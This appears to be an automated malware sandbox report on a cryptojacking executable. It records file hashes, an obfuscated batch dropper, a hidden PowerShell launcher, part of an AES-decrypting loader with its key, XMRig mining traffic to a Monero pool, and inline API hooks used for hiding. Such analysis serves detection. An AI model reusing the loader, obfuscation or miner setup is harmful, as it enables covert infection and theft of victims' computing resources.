                                                                                                                                                        SHA-512:E5964E6E4CA28BCE1396ED66A220099922E66338813B0B1D13A2306FE0B338E4CFB157444B4A11640A8916410C43379B54ED244FCA009316522B67CDE98D41F3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........`......."........@......................................k......................................................0...<...................................................................................l................................text............................... ..`.rdata..n]...0...^..................@..@.bss.....................................pdata...............x..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:DOS batch file, ASCII text, with very long lines (5582), with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5235000
                                                                                                                                                        Entropy (8bit):6.0073843628876284
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:MlmdAvbhv4H9a3Ibr4dk/nWWwzWjOkGa0KICsmqTulEplv7py:T
                                                                                                                                                        MD5:21986423B4FADCE84294B0357B589099
                                                                                                                                                        SHA1:3009CF439A166ED1E44AD5D67E42626D7998B3D0
                                                                                                                                                        SHA-256:A420A6A98959A1FF28F81054E0A04C1E9E95361D9CEBF2F92FDACD9B3A8709A6
                                                                                                                                                        SHA-512:0CBC3255BA1760D0D6FAAA116B36C2EFD5A74E69F0E362AC3D82EBFF6FAE46B8E63137557ADEB7F80BB56FF8E823C903A0D41058A430AE461108FEBE78DFE0E9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:@echo off..%^%@%JeXxkwhVwIaGfhusFhDqicMcbyWrrMiIExlDzGeJRZPuBlWLlaNVUpOHsUvMzQEKzrbHWQSYcTyjmsBQBkfqYnOpJElFksjaufUjkoPuiOSaQFuZtFkpKoLmDMYrEnNKJyOhxrFnuLhkuNzeklmFhUqgtIGxpyPUahrsQmCbZWUYgBRPnUgsbiCOiHOOKiXWWmkmwgnYJkGlaraSRR%%^%e%vrwTSEDkixOrQYYcTrEtgGiJQBrOQHWXSYCEAtsHTWfAUTQmcohBmydOjMdqnOtABRySvtCAYWAjBHOXLeMCAvKuVOvNpbueDEYduXQIMGCpYTmBXfFicQaggdWHYOkXCvGXJLCNndPTSv%%^%c%bCTPkwlcMDSXqajKXwEMCnoSmCRUYbgnLHVeeYZBrtTtQOmMetRxnITOnbDHEqdLwElJffFZwdvjtUbyqfQFjJZdOgQdvsWaqhXmCCGYNSakmKutZerzzxCMEiUZoBDehvSmXPVNySSqJPReLxeqaxASFkHuIHKloWc%%^%h%RivkiDbHFldPqQnRxndKVaHNhBfQhGbMMamDbUhxvSntgRdRuSObSsVRBIcHxkzYkqcqDJPDfFocMnGpxowpSaUufvctSzZlsojQPNnKdkVneSenbMkjNkgjwIkhHvLFGcKxeQAJaMlHeGqmrOrfpQxhiZtgCfcIzqHbhHillAibZyfPsXQTdFpPFDofwtgUJDhNZo%%^%o%JGgUPHwhJTEOFojEUaRvEsdPRtnrwrrPdShmXLAijvElSFBGAYnNiTzrDrcvteLsBOLMhWGjzImjNRWmSHQxdEHksPJGJfPeJmKeUPyErenzGqDLuPDLnopXgBtrmazuThABh%%^% %scjmfZqhDclYlTBdRuWMXswgsrESGzPcECwACbjpGZXqgoPGTQqgEuUZGcUOuxBenjtIwaBQkGgXvgadBXZQiJxkIwUzgvUiyTcWVhjSoAVX
                                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):4926
                                                                                                                                                        Entropy (8bit):3.2455800401968844
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:FaqdF7w8l0+AAHdKoqKFxcxkF28lraqdF7/t3+AAHdKoqKFxcxkFltt:cEG+AAsoJjykcEN+AAsoJjykn
                                                                                                                                                        MD5:0A362A11FE30B0DFACA57A15F776B2F4
                                                                                                                                                        SHA1:BF789925A21249BEB9CF67866C6E81397D2A4A71
                                                                                                                                                        SHA-256:07F7F34823BB951A0D3388864E79A8C2F958CF4BE42EE1D9B39EA78BBD04E472
                                                                                                                                                        SHA-512:DFD929A3BB09C7B03CA092E97C2ED70B7D63698D25F34DCBBF2C4291CC8374C2A1E9663B00AE752A7649BC5DB80153DD61E59B316027B7C6966A424CF7F603E0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. O.c.t. .. 0.5. .. 2.0.2.3. .1.2.:.2.8.:.3.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):64
                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.296102734866757
Encrypted:false
SSDEEP:6144:X41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs++wmBMZJh1Vj1:I1/YCW2AoQ0NiUwwMHrVJ
MD5:013BFCFF83ABF4488741CF5A563A6C43
SHA1:B71D330CF23807CA7C1781498FFA62BD91C800E3
SHA-256:DDBB4913D90FF98E84FC722030DA5AD886B286D3D6349D807CB3791D1EB0CCC4
SHA-512:4D36C9CB4C8350B157F4DA1127B02C15B93D5A4ADE506B62C1F6025E68DD8ECA431B64458612718FD3C538A5F39A99E72F038B686D615B904F6CD412CD023682
Malicious:false
Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~X...

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):85
Entropy (8bit):4.84935141926561
Encrypted:false
SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
MD5:D8C4F9FD5B972AE487170EA993933179
SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
Malicious:false
Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with very long lines (2691), with CRLF line terminators
Category:dropped
Size (bytes):2838
Entropy (8bit):5.280168505226083
Encrypted:false
SSDEEP:48:9JFHDRFZRORgRxUB3zFB3OqjwVba3dJX5NvN595f8bLboJ11ccCr6hy771WgH58W:PFHDRFZQ+7UBxBe1sTrN595f8b13Ohk3
MD5:43AB5228690A7AFA8EBC1ED3CF2D2D7A
SHA1:F885668648D8CC6FB0C4A8BBFC7F94A50AA2354F
SHA-256:D735A8F9913CDDD07D2D52338DA9A4E0F157027F915F489A7FB4511FADBE613D
SHA-512:A0077DA962398F256A50386182CC6B63C2DF4BAFA6F97AB8D256AC7B42D18959EE0D698D8FFEA1F9E63E55ACAD0FA8285BE8C0C09B9A4FDAF620BF6F261DE4AA
Malicious:false
Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function elgju($CRcTF){.$KmeGB=[System.Security.Cryptography.Aes]::Create();.$KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo=');.$KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg==');.$TgPAd=$KmeGB.CreateDecryptor();.$dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length);.$TgPAd.Dispose();.$KmeGB.Dispose();.$dQIvJ;}function VIxdo($CRcTF){.Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', '');.Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblck
File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.999932275677794
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name:e7WMhx18XN.exe
File size:8'201'216 bytes
MD5:38be83afea1e906c05e5b851253cbc6a
SHA1:85841044836479ac3c0b9fb7f1f28928621a4a99
SHA256:425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3
SHA512:17334120d971f389db66d529e76f4385948723868bbaeb3dda45ef0988167f11288fdf65d976179889f13bbea128dd9b768e515a91f18ad2812770020d9b68f7
SSDEEP:196608:UB4i/VIa9g50YQjhHTbq7kGFco1JMdMZoWtz+oeT4wBYR5+Pmk+uy:U6aK6ZSFco1JtZDt+b4F5Hk+u
TLSH:428633CDF51CA85DC5AB133B2809A69E8449C06F8DF2BF3F9E11EE815E1A43631B1176
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................}..........9}.. ...@}...@.. ........................}...........@................................
Icon Hash:90cececece8e8eb0
Entrypoint:0xbd39ee
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x66F895A5 [Sat Sep 28 23:47:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
                                                                                                                                                         Name | Virtual Address | Virtual Size | Is in Section
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7d3998 | 0x53 | .text
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7d4000 | 0x570 | .rsrc
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7d6000 | 0xc | .reloc
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                                                                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                                                                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                                                                                         .text | 0x2000 | 0x7d19f4 | 0x7d1a00 | 428bd0ee91de78e21a1f2ffcd957c968 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                         .rsrc | 0x7d4000 | 0x570 | 0x600 | a40bbed305a64d921058d4f6948b1727 | False | 0.4036458333333333 | data | 4.233104836055197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                         .reloc | 0x7d6000 | 0xc | 0x200 | cf13733b140bdaa0d1cb70d61ac086c2 | False | 0.044921875 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "}" | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                                                                                         RT_VERSION | 0x7d40a0 | 0x22c | data | | | 0.4676258992805755
                                                                                                                                                         RT_MANIFEST | 0x7d42cc | 0x2a0 | XML 1.0 document, ASCII text | | | 0.4732142857142857
                                                                                                                                                         DLL | Import
                                                                                                                                                         mscoree.dll | _CorExeMain
                                                                                                                                                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                         2024-10-08T00:23:47.629655+0200 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.10 | 54464 | 45.76.89.70 | 80 | TCP
                                                                                                                                                         2024-10-08T00:24:19.090576+0200 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.10 | 58455 | 1.1.1.1 | 53 | UDP
                                                                                                                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                         Oct 8, 2024 00:24:12.417530060 CEST | 53 | 56066 | 1.1.1.1 | 192.168.2.10
                                                                                                                                                         Oct 8, 2024 00:24:19.090575933 CEST | 58455 | 53 | 192.168.2.10 | 1.1.1.1
                                                                                                                                                         Oct 8, 2024 00:24:19.119468927 CEST | 53 | 58455 | 1.1.1.1 | 192.168.2.10

Timestamp                              Source IP     Dest IP   Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Oct 8, 2024 00:24:19.090575933 CEST    192.168.2.10  1.1.1.1   0xfedf    Standard query (0)  pool.hashvault.pro  A (IP address)  IN (0x0001)  false

Timestamp                              Source IP  Dest IP       Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Oct 8, 2024 00:24:19.119468927 CEST    1.1.1.1    192.168.2.10  0xfedf    No error (0)  pool.hashvault.pro  -      45.76.89.70     A (IP address)  IN (0x0001)  false
Oct 8, 2024 00:24:19.119468927 CEST    1.1.1.1    192.168.2.10  0xfedf    No error (0)  pool.hashvault.pro  -      95.179.241.203  A (IP address)  IN (0x0001)  false

Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  54464        45.76.89.70     80                1528  C:\Windows\explorer.exe

Timestamp                              Bytes transferred  Direction  Data
Oct 8, 2024 00:24:19.126892090 CEST    568                OUT
  Data Raw:   7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 36 52 4e 78 53 53 45 71 63 50 75 76 34 68 77 45 48 6b 4a 66
  Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx","pass":"","agent":"XMRig/6.15.2 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2019",
Oct 8, 2024 00:24:19.757189989 CEST    731                IN
  Data Raw:   7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 36 35 63 35 64 66 64 2d 65 36 65 66 2d 34 30 37 37 2d 61 39 38 64 2d 66 35 33 38 36
  Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"165c5dfd-e6ef-4077-a98d-f53862eaa2c0","job":{"blob":"10108ebf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b34000000006027b845aa1072d246ee9ea6d567f5c049012afbb137ccad7ee
Oct 8, 2024 00:24:36.999492884 CEST    471                IN
  Data Raw:   7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 34 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a4bf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b340000000002ee761ae05b0ee6a9e5b0f08fbed30e95554c9f96771e6091634b5f65d5c11e48","job_id":"820cb92a-d0c0-4101-ab5e-52084
Oct 8, 2024 00:24:58.902158022 CEST    471                IN
  Data Raw:   7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 61 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010babf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b3400000000b964c9dcd0577437cbd730b0e4dcb03053b9eebfd3878202b9c67bd51e01ed564c","job_id":"3f12f74c-36d7-4762-a400-4d245
Oct 8, 2024 00:25:21.017878056 CEST    471                IN
  Data Raw:   7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 30 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d0bf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b34000000007631affb4bfeb031c95e391c185bf74d68c1ee14fa45b03d4ec20970f366195656","job_id":"99b8c586-f334-43e0-a130-659e2
Oct 8, 2024 00:25:43.034385920 CEST    471                IN
  Data Raw:   7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 36 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e6bf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b3400000000fbd6636fbe928472006578700fea3bc85a86db9c27eb4dd010b70c21f1bdb4f860","job_id":"929b010f-106c-4c18-83e9-9380c
Oct 8, 2024 00:26:01.102925062 CEST    471                IN
  Data Raw:   7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 36 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e6bf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b340000000004ee739db28e8b4832f9993a17b7696d356935eb138b2b3ac7194dd2cff6677260","job_id":"b0dc09fd-86ad-41d1-93e5-afaec
Oct 8, 2024 00:26:05.033957958 CEST    471                IN
  Data Raw:   7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 63 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fcbf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b3400000000379261037194b5b339132c619a16676d580f4d264156cc27b0d09d8ab91fb5716a","job_id":"c6f38ba2-83ac-4260-9138-5a28f


Code Manipulations

Function Name                  Hook Type  Active in Processes
ZwEnumerateKey                 INLINE     explorer.exe, winlogon.exe
NtQuerySystemInformation       INLINE     explorer.exe, winlogon.exe
ZwResumeThread                 INLINE     explorer.exe, winlogon.exe
NtDeviceIoControlFile          INLINE     explorer.exe, winlogon.exe
ZwDeviceIoControlFile          INLINE     explorer.exe, winlogon.exe
NtEnumerateKey                 INLINE     explorer.exe, winlogon.exe
NtQueryDirectoryFile           INLINE     explorer.exe, winlogon.exe
ZwEnumerateValueKey            INLINE     explorer.exe, winlogon.exe
ZwQuerySystemInformation       INLINE     explorer.exe, winlogon.exe
NtResumeThread                 INLINE     explorer.exe, winlogon.exe
RtlGetNativeSystemInformation  INLINE     explorer.exe, winlogon.exe
NtQueryDirectoryFileEx         INLINE     explorer.exe, winlogon.exe
NtEnumerateValueKey            INLINE     explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx         INLINE     explorer.exe, winlogon.exe
ZwQueryDirectoryFile           INLINE     explorer.exe, winlogon.exe

Function Name                  Hook Type  New Data
ZwEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation  INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID: 0
Start time: 18:23:51
Start date: 07/10/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff7df220000
File size: 55'320 bytes
